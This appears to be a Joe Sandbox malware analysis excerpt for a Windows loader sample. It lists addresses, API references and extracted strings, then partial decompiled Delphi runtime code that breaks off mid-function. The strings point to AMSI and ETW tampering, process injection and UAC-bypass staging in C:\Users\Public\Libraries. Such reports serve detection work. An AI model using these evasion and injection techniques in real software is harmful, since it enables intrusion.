0x032c5957
0x032c596d
0x032c596d
0x032c5972
0x032c5977
0x032c597d
0x032c598d
0x032c59a5
0x032c59b0
0x032c59c2
0x032c59da
0x032c59e5
0x032c59e6
0x032c59eb
0x032c59f0
0x032c59f6
0x032c5a06
0x032c5a1e
0x032c5a29
0x032c5a3b
0x032c5a53
0x032c5a5e
0x032c5a5f
0x032c5a64
0x032c5a69
0x032c5a6f
0x032c5a7f
0x032c5a97
0x032c5aa2
0x032c5ab4
0x032c5acc
0x032c5ad7
0x032c5ad8
0x032c5ae8
0x032c5af3
0x032c5aff
0x032c5b0a
0x032c5b0b
0x032c5b10
0x032c5b15
0x032c5b1b
0x032c5b2b
0x032c5b43
0x032c5b4e
0x032c5b60
0x032c5b78
0x032c5b83
0x032c5b84
0x032c5b89
0x032c5b8e
0x032c5b94
0x032c5ba4
0x032c5bbc
0x032c5bc7
0x032c5bd9
0x032c5bf1
0x032c5bfc
0x032c5bfd
0x032c5c02
0x032c5c07
0x032c5c0d
0x032c5c1d
0x032c5c35
0x032c5c40
0x032c5c47
0x032c5c52
0x032c5c6a
0x032c5c75
0x032c5c76
0x032c5c86
0x032c5c91
0x032c5c9d
0x032c5ca8
0x032c5ca9
0x032c5cb9
0x032c5cc4
0x032c5cd0
0x032c5cdb
0x032c5cdc
0x032c5cec
0x032c5cf7
0x032c5d03
0x032c5d0e
0x032c5d0f
0x032c5d1f
0x032c5d2a
0x032c5d36
0x032c5d41
0x032c5d42
0x032c5d52
0x032c5d5d
0x032c5d69
0x032c5d74
0x032c5d75
0x032c5d85
0x032c5d90
0x032c5d9c
0x032c5da7
0x032c5da8
0x032c5db8
0x032c5dc3
0x032c5dcf
0x032c5dda
0x032c5ddb
0x032c5deb
0x032c5df6
0x032c5e02
0x032c5e0d
0x032c5e0e
0x032c5e1e
0x032c5e29
0x032c5e35
0x032c5e40
0x032c5e41
0x032c5e50
0x032c5e5f
0x032c5e6e
0x032c5e7d
0x032c5e8c
0x032c5e9b
0x032c5eaa
0x032c5eb9
0x032c5ec8
0x032c5ed7
0x032c5ee6
0x032c5ef5
0x032c5f04
0x032c5f13
0x032c5f22
0x032c5f31
0x032c5f36
0x032c5f3b
0x032c5f41
0x032c5f51
0x032c5f69
0x032c5f74
0x032c5f86
0x032c5f9e
0x032c5fa9
0x032c5faa
0x032c5faf
0x032c5fb4
0x032c5fba
0x032c5fca
0x032c5fe2
0x032c5fed
0x032c5fff
0x032c6017
0x032c6022
0x032c6023
0x032c6028
0x032c602d
0x032c6033
0x032c6043
0x032c605b
0x032c6066
0x032c606d
0x032c6078
0x032c6090
0x032c609b
0x032c609c
0x032c60ac
0x032c60b7
0x032c60c3
0x032c60ce
0x032c60cf
0x032c60df
0x032c60ea
0x032c60f6
0x032c6101
0x032c6102
0x032c6112
0x032c611d
0x032c6129
0x032c6134
0x032c6135
0x032c6145
0x032c6150
0x032c615c
0x032c6167
0x032c6168
0x032c6178
0x032c6183
0x032c618f
0x032c619a
0x032c619b
0x032c61ab
0x032c61b6
0x032c61c2
0x032c61cd
0x032c61ce
0x032c61de
0x032c61e9
0x032c61f5
0x032c6200
0x032c6201
0x032c6211
0x032c621c
0x032c6228
0x032c6233
0x032c6234
0x032c6244
0x032c624f
0x032c625b
0x032c6266
0x032c6267
0x032c6277
0x032c6282
0x032c628e
0x032c6299
0x032c629a
0x032c62aa
0x032c62b5
0x032c62c1
0x032c62cc
0x032c62cd
0x032c62dd
0x032c62e8
0x032c62f4
0x032c62ff
0x032c6300
0x032c6310
0x032c631b
0x032c6327
0x032c6332
0x032c6333
0x032c6343
0x032c634e
0x032c635a
0x032c6365
0x032c6366
0x032c6376
0x032c6381
0x032c638d
0x032c6398
0x032c6399
0x032c63a9
0x032c63b4
0x032c63c0
0x032c63cb
0x032c63cc
0x032c63dc
0x032c63e7
0x032c63f3
0x032c63fe
0x032c63ff
0x032c640f
0x032c641a
0x032c6426
0x032c6431
0x032c6432
0x032c6442
0x032c644d
0x032c6459
0x032c6464
0x032c6465
0x032c6475
0x032c6480
0x032c648c
0x032c6497
0x032c6498
0x032c64a8
0x032c64b3
0x032c64bf
0x032c64ca
0x032c64cb
0x032c64db
0x032c64e6
0x032c64f2
0x032c64fd
0x032c64fe
0x032c650d
0x032c6512
0x032c6517
0x032c651d
0x032c652d
0x032c6545
0x032c6550
0x032c6562
0x032c657a
0x032c6585
0x032c6586
0x032c658b
0x032c6590
0x032c6596
0x032c65a6
0x032c65be
0x032c65c9
0x032c65db
0x032c65f3
0x032c65fe
0x032c65ff
0x032c6604
0x032c6609
0x032c660f
0x032c661f
0x032c6637
0x032c6642
0x032c6654
0x032c666c
0x032c6677
0x032c6678
0x032c668c
0x032c6693
0x00000000
0x032c3dd6
0x032c3dd6
0x032c3ddb
0x032c3de1
0x032c3df1
0x032c3e09
0x032c3e14
0x032c3e26
0x032c3e3e
0x032c3e49
0x032c3e4a
0x032c3e4f
0x032c3e54
0x032c3e5a
0x032c3e6a
0x032c3e82
0x032c3e8d
0x032c3e9f
0x032c3eb7
0x032c3ec2
0x032c3ec3
0x032c3ec8
0x032c3ecd
0x032c3ed3
0x032c3ee3
0x032c3efb
0x032c3f06
0x032c3f18
0x032c3f30
0x032c3f3b
0x032c3f3c
0x032c3f41
0x032c3f46
0x032c3f4c
0x032c3f5c
0x032c3f74
0x032c3f7f
0x032c3f91
0x032c3fa9
0x032c3fb4
0x032c3fb5
0x032c3fcd
0x032c3fde
0x032c3fe3
0x032c3fe8
0x032c3fee
0x032c3ffe
0x032c4016
0x032c4021
0x032c4033
0x032c404b
0x032c4056
0x032c4057
0x032c406e
0x032c407e
0x032c4083
0x032c4088
0x032c408e
0x032c409e
0x032c40b6
0x032c40c1
0x032c40d3
0x032c40eb
0x032c40f6
0x032c40f7
0x032c40fc
0x032c4101
0x032c4107
0x032c4117
0x032c412f
0x032c413a
0x032c414c
0x032c4164
0x032c416f
0x032c4170
0x032c4175
0x032c417a
0x032c4180
0x032c4190
0x032c41a8
0x032c41b3
0x032c41c5
0x032c41dd
0x032c41e8
0x032c41e9
0x032c41ee
0x032c41f3
0x032c41f9
0x032c4209
0x032c4221
0x032c422c
0x032c423e
0x032c4256
0x032c4261
0x032c4262
0x032c4273
0x032c427a
0x032c427b
0x032c4280
0x032c4283
0x032c4286
0x032c428b
0x032c4291
0x032c42a1
0x032c42b9
0x032c42c4
0x032c42d6
0x032c42ee
0x032c42f9
0x032c42fa
0x032c42ff
0x032c4304
0x032c430a
0x032c431a
0x032c4332
0x032c433d
0x032c434f
0x032c4367
0x032c4372
0x032c4373
0x032c437d
0x032c4383
0x032c4389
0x032c438b
0x032c438d
0x032c438d
0x032c4390
0x032c4390
0x032c4394
0x032c439c
0x032c43a1
0x032c43a6
0x032c43ac
0x032c43bc
0x032c43d4
0x032c43df
0x032c43f1
0x032c4409
0x032c4414
0x032c4415
0x032c441a
0x032c441f
0x032c4425
0x032c4435
0x032c444d
0x032c4458
0x032c446a
0x032c4482
0x032c448d
0x032c448e
0x032c44ad
0x032c44b2
0x032c44b7
0x032c44bd
0x032c44cd
0x032c44e5
0x032c44f0
0x032c4502
0x032c451a
0x032c4525
0x032c4526
0x032c452b
0x032c4530
0x032c4536
0x032c4546
0x032c455e
0x032c4569
0x032c457b
0x032c4593
0x032c459e
0x032c459f
0x032c45a4
0x032c45a9
0x032c45af
0x032c45bf
0x032c45d7
0x032c45e2
0x032c45f4
0x032c460c
0x032c4617
0x032c4618
0x032c4629
0x032c462e
0x032c4630
0x032c4633
0x032c4636
0x032c4645
0x032c4645
0x032c2197
0x032c2197
0x032c219d
0x032c21a2
0x032c21a7
0x032c21a9
0x032c21ab
0x032c21ad
0x032c21af
0x032c21b1
0x032c21b6
0x032c21b8
0x032c21ba
0x032c21bc
0x032c21be
0x032c21c0
0x032c21d0
0x032c21e8
0x032c21f3
0x032c21f8
0x032c21fa
0x00000000
0x032c2200
0x032c2200
0x032c2205
0x032c220b
0x032c221b
0x032c2233
0x032c223e
0x032c2250
0x032c2268
0x032c2273
0x032c2274
0x032c2284
0x032c228f
0x032c2294
0x032c2296
0x00000000
0x032c229c
0x032c229c
0x032c22a1
0x032c22a7
0x032c22b7
0x032c22cf
0x032c22da
0x032c22ec
0x032c2304
0x032c230f
0x032c2310
0x032c2315
0x032c231a
0x032c2320
0x032c2330
0x032c2348
0x032c2353
0x032c2365
0x032c237d
0x032c2388
0x032c2389
0x032c238e
0x032c2393
0x032c2399
0x032c23a9
0x032c23c1
0x032c23cc
0x032c23de
0x032c23f6
0x032c2401
0x032c2402
0x032c2413
0x032c2423
0x032c242b
0x032c2437
0x032c2449
0x032c244c
0x032c2451
0x032c2457
0x032c245c
0x032c245e
0x032c2460
0x032c2462
0x032c2464
0x032c2466
0x032c2468
0x032c246a
0x032c246f
0x032c2471
0x032c2473
0x032c2475
0x032c2477
0x032c2479
0x032c247b
0x032c247d
0x032c248d
0x032c24a5
0x032c24b0
0x032c24c2
0x032c24da
0x032c24e5
0x032c24e6
0x032c252c
0x032c2544
0x032c2556
0x032c2559
0x032c255b
0x032c255e
0x032c2561
0x032c2570
0x032c2570
0x032c2296
0x032c21fa
0x032c0aa5
0x032c0aa5
0x032c0aaa
0x032c0ab0
0x032c0ac0
0x032c0ad8
0x032c0ae3
0x032c0ae8
0x032c0aea
0x00000000
0x032c0af0
0x032c0af0
0x032c0af5
0x032c0afb
0x032c0b0b
0x032c0b23
0x032c0b2e
0x032c0b40
0x032c0b58
0x032c0b63
0x032c0b64
0x032c0b69
0x032c0b6e
0x032c0b74
0x032c0b84
0x032c0b9c
0x032c0ba7
0x032c0bb9
0x032c0bd1
0x032c0bdc
0x032c0bdd
0x032c0be2
0x032c0be7
0x032c0bed
0x032c0bfd
0x032c0c15
0x032c0c20
0x032c0c32
0x032c0c4a
0x032c0c55
0x032c0c56
0x032c0c5b
0x032c0c61
0x032c0c66
0x032c0c77
0x032c0c8e
0x032c0c93
0x032c0c98
0x032c0c9e
0x032c0cae
0x032c0cc6
0x032c0cd1
0x032c0ce3
0x032c0cfb
0x032c0d06
0x032c0d07
0x032c0d0c
0x032c0d11
0x032c0d17
0x032c0d27
0x032c0d3f
0x032c0d4a
0x032c0d5c
0x032c0d74
0x032c0d7f
0x032c0d80
0x032c0d85
0x032c0d8a
0x032c0d90
0x032c0da0
0x032c0db8
0x032c0dc3
0x032c0dd5
0x032c0ded
0x032c0df8
0x032c0df9
0x032c0dfe
0x032c0e03
0x032c0e09
0x032c0e19
0x032c0e31
0x032c0e3c
0x032c0e4e
0x032c0e66
0x032c0e71
0x032c0e72
0x032c0e77
0x032c0e7c
0x032c0e82
0x032c0e92
0x032c0eaa
0x032c0eb5
0x032c0ec7
0x032c0edf
0x032c0eea
0x032c0eeb
0x032c0ef0
0x032c0ef5
0x032c0efb
0x032c0f00
0x032c0f02
0x032c0f04
0x032c0f06
0x032c0f08
0x032c0f0d
0x032c0f0f
0x032c0f11
0x032c0f13
0x032c0f15
0x032c0f25
0x032c0f3c
0x032c0f41
0x032c0f46
0x032c0f4c
0x032c0f5c
0x032c0f74
0x032c0f7f
0x032c0f91
0x032c0fa9
0x032c0fb4
0x032c0fb5
0x032c0fba
0x032c0fbf
0x032c0fc5
0x032c0fd5
0x032c0fed
0x032c0ff8
0x032c100a
0x032c1022
0x032c102d
0x032c102e
0x032c1033
0x032c1038
0x032c103e
0x032c104e
0x032c1066
0x032c1071
0x032c1083
0x032c109b
0x032c10a6
0x032c10a7
0x032c10ac
0x032c10b1
0x032c10b7
0x032c10c7
0x032c10df
0x032c10ea
0x032c10fc
0x032c1114
0x032c111f
0x032c1120
0x032c1125
0x032c112a
0x032c1130
0x032c1140
0x032c1158
0x032c1163
0x032c1175
0x032c118d
0x032c1198
0x032c1199
0x032c11aa
0x032c11b5
0x032c11c2
0x032c11d3
0x032c11de
0x032c11df
0x032c11e4
0x032c11e9
0x032c11ef
0x032c11ff
0x032c1217
0x032c1222
0x032c1234
0x032c124c
0x032c1257
0x032c1258
0x032c125d
0x032c1262
0x032c1268
0x032c1278
0x032c1290
0x032c129b
0x032c12ad
0x032c12c5
0x032c12d0
0x032c12d1
0x032c12d6
0x032c12db
0x032c12e1
0x032c12f1
0x032c1309
0x032c1314
0x032c1326
0x032c133e
0x032c1349
0x032c134a
0x032c134f
0x032c1354
0x032c135a
0x032c136a
0x032c1382
0x032c138d
0x032c139f
0x032c13b7
0x032c13c2
0x032c13c3
0x032c13c8
0x032c13cd
0x032c13d3
0x032c13e3
0x032c13fb
0x032c1406
0x032c1418
0x032c1430
0x032c143b
0x032c143c
0x032c1441
0x032c1446
0x032c144c
0x032c145c
0x032c1474
0x032c147f
0x032c1491
0x032c14a9
0x032c14b4
0x032c14b5
0x032c14c6
0x032c14cd
0x032c14ce
0x032c14d3
0x032c14d6
0x032c14d9
0x032c14de
0x032c14e4
0x032c14f4
0x032c150c
0x032c1517
0x032c1529
0x032c1541
0x032c154c
0x032c154d
0x032c1552
0x032c1557
0x032c155d
0x032c156d
0x032c1585
0x032c1590
0x032c15a2
0x032c15ba
0x032c15c5
0x032c15c6
0x032c15d7
0x032c15f5
0x032c1607
0x032c160f
0x032c161d
0x032c1633
0x032c1645
0x032c1648
0x032c164d
0x032c1653
0x032c1663
0x032c167b
0x032c1686
0x032c1698
0x032c16b0
0x032c16bb
0x032c16bc
0x032c16c1
0x032c16c6
0x032c16cc
0x032c16dc
0x032c16f4
0x032c16ff
0x032c1711
0x032c1729
0x032c1734
0x032c1735
0x032c173f
0x032c174b
0x032c1761
0x032c1773
0x032c1776
0x032c177b
0x032c1781
0x032c1791
0x032c17a9
0x032c17b4
0x032c17c6
0x032c17de
0x032c17e9
0x032c17ea
0x032c17ef
0x032c17f4
0x032c17fa
0x032c180a
0x032c1822
0x032c182d
0x032c183f
0x032c1857
0x032c1862
0x032c1863
0x032c189d
0x032c18b5
0x032c18c7
0x032c18cc
0x032c18cf
0x032c18d2
0x032c18e1
0x032c18e1
0x032c0aea
0x032c0a9f

APIs

InetIsOffline.URL(000008AE,00000000,032C6A6B,?,?,00000259,00000000,00000000), ref: 032BD8D9

Part of subcall function 032B7C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C3C
Part of subcall function 032B7C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C4A
Part of subcall function 032B7C04: GetProcAddress.KERNEL32(74180000,00000000), ref: 032B7C63
Part of subcall function 032B7C04: FreeLibrary.KERNEL32(74180000,74180000,00000000,00000000,00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C82

Part of subcall function 032A2EE0: QueryPerformanceCounter.KERNEL32 ref: 032A2EE4

Part of subcall function 032A7E40: GetFileAttributesA.KERNEL32(00000000,033D2880,032BDEBB,ScanString,032C6AA0,ScanBuffer,032C6AA0,UacInitialize,032C6AA0,UacScan,032C6AA0,Initialize,032C6AA0,ScanBuffer,032C6AA0,OpenSession), ref: 032A7E4B

Part of subcall function 032A7E64: GetFileAttributesA.KERNEL32(00000000,033D2880,032C066B,ScanString,032C6AA0,OpenSession,032C6AA0,ScanBuffer,032C6AA0,OpenSession,032C6AA0,ScanString,032C6AA0,Initialize,032C6AA0,ScanBuffer), ref: 032A7E6F

Part of subcall function 032A802C: CreateDirectoryA.KERNEL32(00000000,00000000,033D2880,032C0787,ScanBuffer,032C6AA0,Initialize,032C6AA0,ScanString,032C6AA0,OpenSession,032C6AA0,ScanBuffer,032C6AA0,OpenSession,032C6AA0), ref: 032A8039

Part of subcall function 032BCB04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,032BCBD6), ref: 032BCB43
Part of subcall function 032BCB04: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 032BCB7D
Part of subcall function 032BCB04: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 032BCBAA
Part of subcall function 032BCB04: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 032BCBB3

Strings

advapi32, xrefs: 032C5281
BCryptQueryProviderRegistration, xrefs: 032BDB39, 032C522C
VirtualAlloc, xrefs: 032C60A7
NtCreateSection, xrefs: 032C62D8
RtlCreateQueryDebugBuffer, xrefs: 032C5E19
smartscreenps, xrefs: 032BDB98, 032BDBC8, 032BDBFB
DlpGetWebSiteAccess, xrefs: 032C5D1A
URL=file:", xrefs: 032C15DA
VirtualProtect, xrefs: 032C610D
NtWaitForSingleObject, xrefs: 032C5DB3
NtOpenProcess, xrefs: 032C52A4, 032C6682
EtwEventWrite, xrefs: 032C64D6
Advapi, xrefs: 032C5E87, 032C5E96, 032C5EA5, 032C5EB4, 032C5EF0, 032C5EFF, 032C5F0E
DllRegisterServer, xrefs: 032BDBE4
Ntdll, xrefs: 032C5E4B, 032C5E5A, 032C5E69, 032C5E78
ntdll, xrefs: 032C5259, 032C526D, 032C5295, 032C52A9, 032C5D64, 032C5D97, 032C5DCA, 032C5DFD, 032C5E30, 032C6223, 032C6256, 032C6289, 032C62BC, 032C62EF, 032C6322, 032C6355, 032C6388, 032C63BB, 032C63EE, 032C6421, 032C6454, 032C6487, 032C64BA, 032C64ED, 032C6687
CreateProcessA, xrefs: 032C5ECD
FindCertsByIssuer, xrefs: 032BDA76
ws2_32, xrefs: 032C5F1D
psapi, xrefs: 032C5EC3
connect, xrefs: 032C5F18
DlpNotifyPreDragDrop, xrefs: 032C5C81
C:\Windows\SysWOW64, xrefs: 032C227F
ScanString, xrefs: 032BD90D, 032BDE2C, 032BDECE, 032BDF5C, 032BE16C, 032BEBEA, 032BED7D, 032BEF91, 032BF5A7, 032BF7BF, 032BF8DA, 032BFBFA, 032BFF21, 032C0125, 032C0343, 032C05DB, 032C0930, 032C0B74, 032C0E82, 032C10B7, 032C1268, 032C155D, 032C16CC, 032C1781, 032C2114, 032C220B, 032C3E5A, 032C3F4C, 032C4107, 032C474A, 032C48B5, 032C4B27, 032C535C, 032C5430, 032C573D, 032C5A6F, 032C6033
MZP, xrefs: 032C569A
EnumServicesStatusExW, xrefs: 032C5EAF
OpenProcess, xrefs: 032C6140
can, xrefs: 032C247D
IconIndex=, xrefs: 032C162E
NtDeviceIoControlFile, xrefs: 032C5E55
EnumServicesStatusW, xrefs: 032C5E91
DllGetClassObject, xrefs: 032BDB87
FlushInstructionCache, xrefs: 032C61A6
DlpCheckIsCloudSyncApp, xrefs: 032C5CB4
C:\Windows\System32\, xrefs: 032BDEA6, 032C3FC8, 032C4BB7
CreateProcessWithLogonW, xrefs: 032C5F09
BCryptVerifySignature, xrefs: 032BDB12, 032C5218, 032C5AE3
endpointdlp, xrefs: 032C5C98, 032C5CCB, 032C5CFE, 032C5D31
CreateProcessAsUserW, xrefs: 032C5EFA, 032C5F27
WriteVirtualMemory, xrefs: 032C6173
mssip32, xrefs: 032BDAAE, 032BDAD5, 032BDAFC
NtOpenFile, xrefs: 032C6470
EnumServicesStatusExA, xrefs: 032C5EA0
http, xrefs: 032BF301
Kernel32, xrefs: 032C5ED2, 032C5EE1, 032C5F2C
^^Nc, xrefs: 032BEC5E
CryptSIPGetSignedDataMsg, xrefs: 032BDAEB
NtOpenSection, xrefs: 032C62A5
C:\\Users\\Public\\Libraries\\, xrefs: 032C0EF0
NtAccessCheck, xrefs: 032C63A4
RtlAllocateHeap, xrefs: 032C5D80, 032C5DE6
NtOpenObjectAuditAlarm, xrefs: 032C5268
[InternetShortcut], xrefs: 032C15CB
CryptSIPVerifyIndirectData, xrefs: 032BDAC4
.url, xrefs: 032C0AB0
GET, xrefs: 032BF61C
iexpress.exe, xrefs: 032BDFCF
TrustOpenStores, xrefs: 032BDA28
NtAlertResumeThread, xrefs: 032C5D4D
WinHttp.WinHttpRequest.5.1, xrefs: 032BF509
UacScan, xrefs: 032BDC9A, 032BE001, 032BE9C5, 032BF1A1, 032BF495, 032BFB03, 032C0F4C, 032C4A35, 032C4CF3, 032C4FBB, 032C50B8, 032C55AD, 032C56C4
NtQuerySecurityObject, xrefs: 032C6371
C:\Users\Public\, xrefs: 032C0AA5, 032C1868
DEEX, xrefs: 032BD8E7
DllGetActivationFactory, xrefs: 032BDBB1
NtReadVirtualMemory, xrefs: 032C5254, 032C633E
NtQueryVirtualMemory, xrefs: 032C623F
CreateProcessAsUserA, xrefs: 032C5EEB
I_QueryTagInformation, xrefs: 032C527C
bcrypt, xrefs: 032BDB23, 032BDB4A, 032BDB71, 032C521D, 032C5231, 032C5245, 032C5AFA
C:\Users\Public\Libraries, xrefs: 032BE1DF
HotKey=, xrefs: 032C175C
SetUnhandledExceptionFilter, xrefs: 032C61D9
NtMapViewOfSection, xrefs: 032C630B
VirtualAllocEx, xrefs: 032C60DA
NtSetSecurityObject, xrefs: 032C5290
NtWriteVirtualMemory, xrefs: 032C643D
NtGetWriteWatch, xrefs: 032C620C
LdrGetProcedureAddress, xrefs: 032C640A
EtwEventWriteEx, xrefs: 032C64A3
CreateProcessW, xrefs: 032C5EDC
WintrustAddActionID, xrefs: 032BDA4F
NtQuerySystemInformation, xrefs: 032C5E46
UacInitialize, xrefs: 032BDD13, 032BE0F3, 032C0AFB, 032C3CDA, 032C5F41
Initialize, xrefs: 032BDC21, 032BE07A, 032BE1F4, 032BE389, 032BE4F4, 032BE763, 032BED04, 032BEF18, 032BF21A, 032BF861, 032BFA8A, 032BFD11, 032BFEA8, 032C00AC, 032C02CA, 032C067E, 032C0D17, 032C103E, 032C13D3, 032C1CEF, 032C1E86, 032C2022, 032C22A7, 032C408E, 032C47C3, 032C49A7, 032C4F2B, 032C5034, 032C57FC, 032C597D, 032C5B94, 032C651D
NtQueryDirectoryFile, xrefs: 032C5E64
DlpGetArchiveFileTraceInfo, xrefs: 032C5CE7
CryptSIPGetInfo, xrefs: 032BDA9D
LdrLoadDll, xrefs: 032C63D7
BCryptRegisterProvider, xrefs: 032BDB60, 032C5240
wintrust, xrefs: 032BDA39, 032BDA60, 032BDA87
EnumProcessModules, xrefs: 032C5EBE
OpenSession, xrefs: 032BD96E, 032BE2E6, 032BE402, 032BE5E6, 032BE65F, 032BE7DC, 032BE947, 032BEA4D, 032BEB71, 032BEE14, 032BF036, 032BF128, 032BF39C, 032BF41C, 032BF52E, 032BF640, 032BF746, 032BF978, 032BFB81, 032BFD8A, 032BFF9A, 032C019E, 032C03BC, 032C0562, 032C0792, 032C08B7, 032C09A9, 032C0BED, 032C0C9E, 032C0E09, 032C1130, 032C11EF, 032C12E1, 032C14E4, 032C1653, 032C17FA, 032C1BD7, 032C1D68, 032C1EFF, 032C209B, 032C2320, 032C3C61, 032C3DE1, 032C3ED3, 032C4180, 032C4291, 032C43AC, 032C45AF, 032C492E, 032C4AAE, 032C4C01, 032C4E17, 032C4EB2, 032C5131, 032C52E3, 032C54A9, 032C5875, 032C59F6, 032C5B1B, 032C5FBA, 032C660F
ScanBuffer, xrefs: 032BD9CF, 032BDD8C, 032BE26D, 032BE47B, 032BE56D, 032BE6D8, 032BE855, 032BE8CE, 032BEAC6, 032BEC8B, 032BEE8D, 032BF0AF, 032BF293, 032BF323, 032BF6B9, 032BF9F1, 032BFC98, 032BFE03, 032C0013, 032C0217, 032C0435, 032C06F7, 032C080B, 032C0A22, 032C0D90, 032C0FC5, 032C135A, 032C144C, 032C1C50, 032C1DE1, 032C1F78, 032C2399, 032C3D53, 032C3FEE, 032C41F9, 032C430A, 032C4425, 032C44BD, 032C4536, 032C483C, 032C4C7A, 032C4D9E, 032C51AA, 032C5522, 032C5626, 032C58EE, 032C5C0D, 032C6596
RtlQueryProcessDebugInformation, xrefs: 032C5E73
acS, xrefs: 032C246A
kernel32, xrefs: 032C60BE, 032C60F1, 032C6124, 032C6157, 032C618A, 032C61BD, 032C61F0
EnumServicesStatusA, xrefs: 032C5E82
NtQueryInformationThread, xrefs: 032C6272

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: File$AttributesCreateLibraryPath$AddressCloseCounterDirectoryFreeHandleInetLoadModuleNameName_OfflinePerformanceProcQueryWrite
String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$ScanBuffer$ScanString$SetUnhandledExceptionFilter$TrustOpenStores$URL=file:"$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$wintrust$ws2_32
API String ID: 598625507-512624929
Opcode ID: 06314009de90eaca966c2440ef06e1fff63e4a51d5caf9ae64a7e807157990dc
Instruction ID: b2d5431b629ae6d7a7a9e2f13110d104b45f35bed47d23a045c68f34d68505fc
Opcode Fuzzy Hash: 06314009de90eaca966c2440ef06e1fff63e4a51d5caf9ae64a7e807157990dc
Instruction Fuzzy Hash: DDD30B39A316989FCB11F769DC80ADEB3B9AF44700F5485A69109AB305DEF0EEC58F50

Uniqueness

Uniqueness Score: -1.00%

Function 032A5A90 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E032A5A90(CHAR* __eax) {
				CHAR* _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t74;
				CHAR* _t99;
				CHAR* _t100;
				intOrPtr _t104;
				struct HINSTANCE__* _t112;
				void* _t115;
				void* _t117;
				intOrPtr _t118;

				_t115 = _t117;
				_t118 = _t117 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t115);
					_push(0x32a5b95);
					_push( *[fs:eax]);
					 *[fs:eax] = _t118;
					_v28 = 5;
					E032A58CC( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E032A5CFC, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(E032A5B9C);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							lstrcpynA( &_v289, _v8, 0x105);
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5);
							_t112 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t99 =  &(( &_v289)[lstrlenA( &_v289)]);
								while( *_t99 != 0x2e && _t99 !=  &_v289) {
									_t99 = _t99 - 1;
								}
								_t74 =  &_v289;
								if(_t99 != _t74) {
									_t100 =  &(_t99[1]);
									if(_v22 != 0) {
										lstrcpynA(_t100,  &_v22, 0x105 - _t100 - _t74);
										_t112 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t112 == 0 && _v17 != 0) {
										lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
										_t112 = LoadLibraryExA( &_v289, 0, 2);
										if(_t112 == 0) {
											_v15 = 0;
											lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
